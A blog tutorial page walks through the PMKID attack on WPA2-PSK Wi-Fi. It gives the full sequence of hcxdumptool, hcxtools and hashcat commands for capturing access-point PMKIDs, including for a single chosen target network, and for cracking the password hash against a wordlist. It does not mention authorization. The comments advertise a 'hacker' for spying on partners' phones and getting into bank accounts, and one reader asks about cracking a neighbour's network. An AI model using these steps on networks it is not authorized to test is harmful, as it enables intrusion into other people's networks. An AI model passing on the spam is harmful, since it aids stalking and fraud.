top of page
  • Writer's pictureotw

Wi-Fi Hacking, Part 11: The PMKID Attack

Updated: Feb 17, 2023

Welcome back, my aspiring cyber warriors!

As you know, the key to hacking the WPA2-PSK is to capture the PSK (pre-shared key or password) as it passes through the air in the 4-way handshake between the client and the AP (you must be in monitor mode to do so). This requires that we either wait for a client to connect to the AP or if a client has already connected, then we bump the client off (de-authenticate) the AP and wait for them to re-connect.

What if we could skip that step to get the password hash directly from the AP. That is exactly what the PMKID attack is!

This new technique (August 2018) was developed by the security researchers at hashcat, the fast Linux-based password cracking tool. They were conducting research on Wi-Fi hacking with the tools included in hcxtools repository and when they found something interesting. They found that they could pull information directly from the AP that included the PSK without a client connecting to the AP!

Let's see how this tool works and use it on some AP's.

Step #1: Download and Install hcxdumptool

The tools we need for this hack are not built into Kali but we can get them from

First, we need to download hcxtools.

Next, download hcxdumptools.

Once it has downloaded, we then need to make and install each of these tools.

Navigate to the new hcxdumptool directory.

kali > cd hcxdumptool

Then run make and make install

kali > make

kali > make install

Then navigate to the hcxtools directory and do the same.

kali > cd hcxtools

kali > make

kali > make install

Step #2: Place your wireless adapter into monitor mode with airmon-ng

Next, we need to start airmon-ng from the aircrack-ng suite of Wi-Fi hacking tools to put our wireless adapter into monitor mode.

kali > airmon-ng start wlan0

Note that when airmon-ng starts it will rename your wireless card from wlan0 to wlan0mon.

Now, start airodump-ng on the wireless adapter in monitor mode.

kali > airodump-ng wlan0mon

Step #3: Use hcxdumptool to Capture the PMKID

The next step is to use the hcxdumptool to go out to the Wi-Fi AP's and grab the PMKID that contains the PSK (pre-shared key or password).

kali > hcxdumptool -i wlan0mon -o Hackers-ArisePMKID --enable_status=1


-i indicates the Wi-Fi adapter (wlan0mon in this case)

-o is for output. This is a file you designate to write the PMKID to


Now, run the command and be patient. In some cases, it may take hours to grab all the PMKID's. As you can see in the screenshot above, hcxdumptool is grabbing and enumerating each PMKID for each AP in the area.

Step #4: Capturing a Single PMKID

In most cases, you probably will not want to grab all the PMKID's in the area, but rather target one specifically. We can do this by adding a filter for the BSSID of the target AP.

To do so, you will need to create a text file with the only the BSSID of the target AP without any colons or commas. You can do his using the cat command such as;

kali > cat > target BSSID


Use CTRL+D to exit cat. Make certain that the second line contains the target BSSID and nothing else.

This now creates a simple text file of the target BSSID that hcxdumptool can read.

Now, to use this filter for a single AP, we simply append a few options onto our previous command. Most importantly, we add



These two options tell hcxdumptool to use the AP BSSID as a filter and only capture the PMKID from that single AP.

kali > kali > hcxdumptool -i wlan0mon -o Hackers-ArisePMKID

--enable_status=1 --filterlist_ap=targetBSSID --filtermode=2

Note that after awhile (in some cases, hours), hcxdumptoool was able to capture the PMKID of the single target AP and place it into our file "HackersArisePMKID"!

Step #5: Strip Out All the Extraneous Data in the PMKID

The PMKID contains the hash of the PSK, but also a lot of other information we don't need or want. We need to strip out that data leaving us just the hash of the PSK before we can start cracking the hash. To do this, we need to hcxcaptool that is part of the group of tools we downloaded earlier as part of the hcxtools.

Navigate to the hcxtool directory.

kali > cd hcxtools

Now, we use hcxcaptool to strip out all the other information in that file leaving us with just the PSK hash.

kali > hcxcaptool -z hashoutput.txt HackersArisePMKID

This will now leave us with the PSK hash in the file we designated here after the -z option, hashoutput.txt

Step #6: Crack the Hash!

Our final step is to crack the hash. We can do that with any of the password cracking tools in our arsenal including john, hashcat and many others. Here, I'll use hashcat to crack it using the top 10,000 passwords as my wordlist.

kali > hashcat -m 16800 hashoutput.txt top100000password.txt


hashcat is the password hash cracking tool

-m 16800 designates the type of hash

hashoutput.txt is the file containing the stripped out PSK hash

top100000passwords.txt is a plain text file containing the 10,000 most common passwords


The new PMKID attack (August 2018) provides us with one more method of attacking the WPA2-PSK enabled Wi-Fi AP's. The beauty of this attack is that doesn't require us to wait for a client to connect and associate or deauthenticate a client. In my tests, 80-90% of wireless AP's with respond with the PMKID when probed with the hcxdumptool.

For more on Wi-Fi hacking, see my Wi-Fi hacking series here or purchase the Wi-Fi hacking videos in our online store. To learn more Wi-Fi Hacking and other hacking techniques join our Subscriber program.


Jan 02, 2023

i know of a very good hacker that can help you with any type of hacking, either phones or computers. My husband was so smooth at hiding his infidelity so I had no proof for months, I was referred to some hacker and decided to give him a try.. the result was incredible because all my cheating husband’s text messages, emails , facebook and even phone conversations was wired directly to my cellphone. Computerguru helped me put a round-the-clock monitoring on him and I got concrete evidence of his escapades..if you think your spouse is an expert at hiding his cheating adventure, you can contact them too at HENRYCLARKETHICALHACKER@GMAIL.COM on whatsapp12622367526.


Hey everyone , I don’t really know much about this hacking things but I can direct you to a professional hacking company who helped me to track and hack my boyfriend’s iPhone and his Facebook respectively.. If you need to check on your partner’s sincerity, employee’s honesty, recover your email passwords, Social networks (i.e Facebook, Twitter, IG), change your school grades, clear your criminal records, gain access to bank accounts,spy on phone. you can just contact them at … Their charges are minimal and negotiable contact them at Henryclarkethicalhacker @ gmail, com]..tell him you are from me or text him or whatsapp +1 8 1 3 4 2 1 1 3 2 6…. You can thank me later.


The make command is giving me some trouble , when i run it inside the hcxdumptools folder it says : mkdir -p .deps

make: pkg-config: No such file or directory

make: pkg-config: No such file or directory

cc -O3 -Wall -Wextra -std=gnu99 -MMD -MF .deps/hcxdumptool.d -o hcxdumptool hcxdumptool.c -DVERSION_TAG=\"6.2.5-26-g7dc1cc4\" -DVERSION_YEAR=\"2021\"

hcxdumptool.c:41:10: fatal error: openssl/conf.h: No such file or directory

41 | #include <openssl/conf.h>

| ^~~~~~~~~~~~~~~~

compilation terminated.

make: *** [Makefile:74: hcxdumptool] Error 1


Good review.

After two weeks of search howtohack wifi i notice that the important thing of all is the wordlist. If your try to hack your neigbours wifi password you must have his password in a wordlist otherwise you won't find it. Perhaps trying evil twin methode is better for this purpose.

Anybody knows other ?? please reply

Replying to

Attempting to hack your neighbor's wifi is both unethical and illegal.


Money unter 1€? Zum Beispiel 100000000000? Senden?

bottom of page